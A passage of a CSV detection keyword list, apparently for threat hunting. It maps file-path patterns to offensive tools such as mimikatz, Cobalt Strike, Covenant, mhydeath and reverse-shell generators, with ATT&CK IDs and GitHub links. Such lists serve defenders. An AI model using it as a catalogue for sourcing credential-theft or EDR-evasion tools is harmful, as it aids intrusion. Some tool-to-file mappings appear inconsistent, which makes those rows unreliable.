T1595.002 - T1078.003,TA0006 - TA0009,N/A,N/A,Exploitation tools,https://github.com/dafthack/MFASweep,1,1,N/A,9,10,1033,152,2023-07-25T05:10:55Z,2020-09-22T16:25:03Z -*/mhydeath.git*,offensive_tool_keyword,mhydeath,Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.,T1562.001,TA0040 - TA0005,N/A,N/A,Defense Evasion,https://github.com/zer0condition/mhydeath,1,1,N/A,10,3,251,47,2023-08-22T08:01:04Z,2023-08-22T07:15:36Z -*/mhydeath.sln*,offensive_tool_keyword,mhydeath,Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.,T1562.001,TA0040 - TA0005,N/A,N/A,Defense Evasion,https://github.com/zer0condition/mhydeath,1,1,N/A,10,3,251,47,2023-08-22T08:01:04Z,2023-08-22T07:15:36Z -*/mhydeath/main.cpp*,offensive_tool_keyword,mhydeath,Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.,T1562.001,TA0040 - TA0005,N/A,N/A,Defense Evasion,https://github.com/zer0condition/mhydeath,1,1,N/A,10,3,251,47,2023-08-22T08:01:04Z,2023-08-22T07:15:36Z -*/michaelweber/Macrome*,offensive_tool_keyword,Macrome,An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/,T1140,TA0005,N/A,N/A,Exploitation tools,https://github.com/michaelweber/Macrome,1,1,N/A,N/A,6,522,83,2022-02-01T16:26:13Z,2020-05-07T22:44:11Z -*/micr0%20shell.py*,offensive_tool_keyword,micr0_shell,micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.,T1059.003 - T1027.001,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/senzee1984/micr0_shell,1,1,N/A,9,1,91,12,2023-09-16T02:35:28Z,2023-08-13T02:46:51Z -*/micr0_shell.git*,offensive_tool_keyword,micr0_shell,micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.,T1059.003 - T1027.001,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/senzee1984/micr0_shell,1,1,N/A,9,1,91,12,2023-09-16T02:35:28Z,2023-08-13T02:46:51Z -*/MicroBurst.git*,offensive_tool_keyword,MicroBurst,A collection of scripts for assessing Microsoft Azure security,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/NetSPI/MicroBurst,1,1,N/A,6,10,1709,280,2023-09-21T15:53:06Z,2018-07-16T16:47:20Z -*/mikrotik-routeros-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/mimi32.exe*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*/mimi64.exe*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*/mimicom.idl*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*/mimidrv.sys*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*/mimidrv.zip*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*/mimikatz.enc*,offensive_tool_keyword,mortar,red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions,T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562,TA0002 - TA0003 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/0xsp-SRD/mortar,1,1,N/A,N/A,10,1181,193,2022-08-03T03:38:57Z,2021-11-25T16:49:47Z -*/mimikatz.sln*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*/mimikatz_bypass/mimikatz.py*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*/mimikatz_bypass/mimikatz2.py*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*/mimikatz_bypassAV/main.exe*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*/mimikatz_bypassAV/mimikatz_load.exe*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*/mimikatz_load.exe*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*/mimilib.def*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*/mimilove.c*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*/mimilove.h*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*/mimilove.rc*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*/mimipenguin.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/mimipenguin.c*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*/mimipenguin.md*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/mimipenguin/*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*/mimipenguin/*,offensive_tool_keyword,crossc2,generate CobaltStrike's cross-platform payload,T1547.001 - T1055 - T1027 - T1105 - T1047,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*/mimipy.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*/mimishim/*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*/minidump.go*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,1,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -*/minimal_elf.h*,offensive_tool_keyword,cobaltstrike,This is a ELF object in memory loader/runner. The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/ELFLoader,1,1,N/A,10,10,204,40,2022-05-16T17:48:40Z,2022-04-26T19:18:20Z -*/mirai_pass.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/Misc/donut.exe*,offensive_tool_keyword,cobaltstrike,Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/GhostPack/Koh,1,1,N/A,10,10,447,59,2022-07-13T23:41:38Z,2022-07-07T17:14:09Z -*/mitmAP*,offensive_tool_keyword,mitmAP,A python program to create a fake AP and sniff data,T1563 - T1593 - T1594 - T1567,TA0002 - TA0007 - TA0009 - TA0010,N/A,N/A,Sniffing & Spoofing,https://github.com/xdavidhu/mitmAP,1,1,N/A,N/A,10,1619,282,2019-11-03T11:34:06Z,2016-10-22T21:49:25Z -*/mmouse-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/mmouse-exec.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/Mockingjay_BOF.git*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object File (BOF) Conversion of the Mockingjay Process Injection Technique,T1055.012 - T1059.001 - T1027.002,TA0002 - TA0005,N/A,N/A,C2,https://github.com/ewby/Mockingjay_BOF,1,1,N/A,9,10,32,7,2023-08-27T14:09:39Z,2023-08-27T06:01:28Z -*/modbus-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/Models/PowerShellLauncher.*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*/Models/Regsvr32Launcher.*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*/Models/ShellCodeLauncher.*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*/Modlishka.git*,offensive_tool_keyword,Modlishka ,Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.,T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002,TA0011 - TA0001 - TA0002 - TA0005 - TA0040,N/A,N/A,Network Exploitation Tools,https://github.com/drk1wi/Modlishka,1,1,N/A,5,10,4434,854,2023-04-10T07:30:13Z,2018-12-19T15:59:54Z -*/module/darkexe/*,offensive_tool_keyword,FourEye,AV Evasion Tool,T1059 - T1059.001 - T1059.005 - T1027 - T1027.005,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/lengjibo/FourEye,1,0,N/A,10,8,724,154,2021-12-08T11:55:15Z,2020-12-11T01:29:58Z 